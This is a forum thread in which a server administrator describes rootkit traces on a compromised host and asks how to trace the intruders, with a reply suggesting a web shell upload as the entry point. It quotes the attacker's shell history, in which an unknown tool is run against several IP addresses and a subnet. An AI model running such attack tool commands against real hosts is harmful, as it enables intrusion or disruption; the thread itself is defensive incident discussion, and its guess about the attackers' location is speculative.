chkrootkit and rkhunter report that there are traces of several rootkits installed.
First I tried to clean manually following the recipes found on this forum and elsewhere on the net, but I could not do even the first steps (I could not save /etc/rc.d/rc.sysinit after removing xntps from it - why? I don't know)
So, I decided to choose the way many seem to prefer - asking a reinstall of the OS and setting up things from backups.
Before I ask for the format, though, it would be nice to find out something about the possible gate for my guests and also what they are doing and who they are.
Is it possible to trace them somehow?
I noticed two possible clues:
1) Clue 1
In /root/bash_history I find
./c4 -h 188.8.131.52
./c4 -h 184.108.40.206
./c4 -h 220.127.116.11
./c4 -d 200.158.70 -s 200
The shell.php is most likely the entrance point, I've seen it myself before on our demo account before we locked it down.
Sounds like they found a site your hosting that has an exploit and used it to upload the shell.php , and then after that, used the shell to download and execute the rootkits.
Its also possible that you offer a demo acct and since cpanel isnt the best at securing demo accounts, they couldve easily uploaded the shell script. If you do offer a demo account, do 'chmod 000 /home/demoacct' to make it so no files can be in there.
Unfortunately, sounds like they are in India, and you wont be able to do much about it if that is the situation.